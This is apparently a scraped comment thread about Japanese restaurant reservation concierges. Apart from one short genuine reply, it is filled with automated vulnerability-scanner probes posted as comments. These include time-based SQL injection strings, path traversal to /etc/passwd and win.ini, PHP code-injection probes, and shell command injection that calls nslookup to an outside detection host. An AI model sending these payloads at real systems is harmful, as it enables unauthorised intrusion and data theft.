.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kk1337
WEB-INF/web.xml
re: kk1337
WEB-INF\web.xml
re: kk1337
1
re: kk1337
1
re: kk1337
-1 OR 2+616-616-1=0+0+0+1 --
re: kk1337
-1 OR 3+616-616-1=0+0+0+1 --
re: kk1337
-1 OR 2+314-314-1=0+0+0+1
re: kk1337
-1 OR 3+314-314-1=0+0+0+1
re: kk1337
-1' OR 2+690-690-1=0+0+0+1 --
re: kk1337
-1' OR 3+690-690-1=0+0+0+1 --
re: kk1337
-1' OR 2+734-734-1=0+0+0+1 or 'zMG3VXdL'='
re: kk1337
-1' OR 3+734-734-1=0+0+0+1 or 'zMG3VXdL'='
re: kk1337
-1" OR 2+497-497-1=0+0+0+1 --
re: kk1337
-1" OR 3+497-497-1=0+0+0+1 --
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
h6amh7JU'; waitfor delay '0:0:15' --
re: kk1337
-5 OR 533=(SELECT 533 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 499=(SELECT 499 FROM PG_SLEEP(15))--
re: kk1337
8hBytlFE' OR 686=(SELECT 686 FROM PG_SLEEP(15))--
re: kk1337
3G9xJLK8') OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: kk1337
2hfC0I4m')) OR 408=(SELECT 408 FROM PG_SLEEP(15))--
re: kk1337
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@w5Szg
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1
re: kk1337
1
I think it should be like all other online concierges. They might have partnership with certain restaurants, whereas others they only will call but there is likely no hope of getting a reservation.
I remember seeing certain restaurants charging full amount when you make a reservation whereas others are charging 1000JPY.
re: guest
kTI7UB41
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+135-135-1=0+0+0+1
re: guest
-1 OR 3+135-135-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
tbTKlxcm'; waitfor delay '0:0:15' --
re: guest
-5 OR 913=(SELECT 913 FROM PG_SLEEP(15))--
re: guest
-5) OR 279=(SELECT 279 FROM PG_SLEEP(15))--
re: guest
-1)) OR 214=(SELECT 214 FROM PG_SLEEP(15))--
re: guest
WBzpG8BY' OR 873=(SELECT 873 FROM PG_SLEEP(15))--
re: guest
n9cYWFcK') OR 93=(SELECT 93 FROM PG_SLEEP(15))--
re: guest
ZtbLlKmu')) OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@lIkv6
re: guest
pAU0xMTy
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+166-166-1=0+0+0+1
re: guest
-1 OR 3+166-166-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Hcs9A7uB'; waitfor delay '0:0:15' --
re: guest
-5 OR 512=(SELECT 512 FROM PG_SLEEP(15))--
re: guest
-5) OR 496=(SELECT 496 FROM PG_SLEEP(15))--
re: guest
-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--
re: guest
7Z87XrOl' OR 565=(SELECT 565 FROM PG_SLEEP(15))--
re: guest
Ax96Dhwj') OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: guest
NZ2d8l4v')) OR 413=(SELECT 413 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@EK8GE
re: guest
1sTZv0m2O
re: guest
%0abcc:074625.67-12678.67.126f6.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-12679.67.126f6.19990.2@bxss.me
re: guest
response.write(9727041*9052049)
re: guest
'+response.write(9727041*9052049)+'
re: guest
"+response.write(9727041*9052049)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
${9999446+9999140}
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
)
re: guest
/etc/passwd
re: guest
echo lncxpi$()\ sebbzu\nz^xyu||a #' &echo lncxpi$()\ sebbzu\nz^xyu||a #|" &echo lncxpi$()\ sebbzu\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitly'.'kkekqosgecb4a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(108).chr(66).'
re: guest
!(()&&!|*|*|
re: guest
%2fetc%2fpasswd
re: guest
&echo qkaemm$()\ apuxim\nz^xyu||a #' &echo qkaemm$()\ apuxim\nz^xyu||a #|" &echo qkaemm$()\ apuxim\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
".gethostbyname(lc("hituo"."wgrfpttu56a7d.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(67).chr(103).chr(75)."
re: guest
^(#$!@#$)(()))******
re: guest
|echo szsbsy$()\ flxvop\nz^xyu||a #' |echo szsbsy$()\ flxvop\nz^xyu||a #|" |echo szsbsy$()\ flxvop\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitylwjnspdpq674a1.bxss.me||perl -e "gethostbyname('hitylwjnspdpq674a1.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hitypkaaibhigd919b.bxss.me||perl -e "gethostbyname('hitypkaaibhigd919b.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitztnaeeqcbr3024e.bxss.me&'\"`0&nslookup hitztnaeeqcbr3024e.bxss.me&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&'\"`0&(nslookup hittnelgwurvg6abb3.bxss.me||perl -e "gethostbyname('hittnelgwurvg6abb3.bxss.me')")&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitgqpjeapvlg8658d.bxss.me||perl -e "gethostbyname('hitgqpjeapvlg8658d.bxss.me')")
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(104).concat(69).concat(120).concat(70)+(require"socket"
Socket.gethostbyname("hitwz"+"sqfnaxgt2e32f.bxss.me.")[3].to_s)+"
re: guest
file:///etc/passwd
re: guest
`(nslookup hithxtziycvczc915f.bxss.me||perl -e "gethostbyname('hithxtziycvczc915f.bxss.me')")`
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(120).concat(69).concat(118).concat(85)+(require'socket'
Socket.gethostbyname('hitwe'+'wmvikkrw48c45.bxss.me.')[3].to_s)+'
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")|(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")&(nslookup hitiwxvwrlyii3ad43.bxss.me||perl -e "gethostbyname('hitiwxvwrlyii3ad43.bxss.me')")
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
Http://bxss.me/t/fit.txt
re: guest
/WEB-INF/web.xml
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
/etc/shells
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
c:/windows/win.ini
re: guest
/../../../../../../../../../../boot.ini
re: guest
bxss.me
re: guest
'"
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
<!--
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
${@print(md5(31337))}
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
${@print(md5(31337))}\
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
'.print(md5(31337)).'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+978-978-1=0+0+0+1 --
re: guest
-1 OR 3+978-978-1=0+0+0+1 --
re: guest
-1 OR 2+482-482-1=0+0+0+1
re: guest
-1 OR 3+482-482-1=0+0+0+1
re: guest
-1' OR 2+90-90-1=0+0+0+1 --
re: guest
-1' OR 3+90-90-1=0+0+0+1 --
re: guest
-1' OR 2+55-55-1=0+0+0+1 or 'RX1VANZG'='
re: guest
-1' OR 3+55-55-1=0+0+0+1 or 'RX1VANZG'='
re: guest
-1" OR 2+793-793-1=0+0+0+1 --
re: guest
-1" OR 3+793-793-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Haz4Je7k'; waitfor delay '0:0:15' --
re: guest
-5 OR 723=(SELECT 723 FROM PG_SLEEP(15))--
re: guest
-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))--
re: guest
-1)) OR 231=(SELECT 231 FROM PG_SLEEP(15))--
re: guest
dt2M98Qi' OR 903=(SELECT 903 FROM PG_SLEEP(15))--
re: guest
8RSC49z7') OR 795=(SELECT 795 FROM PG_SLEEP(15))--
re: guest
7coLKXYE')) OR 568=(SELECT 568 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
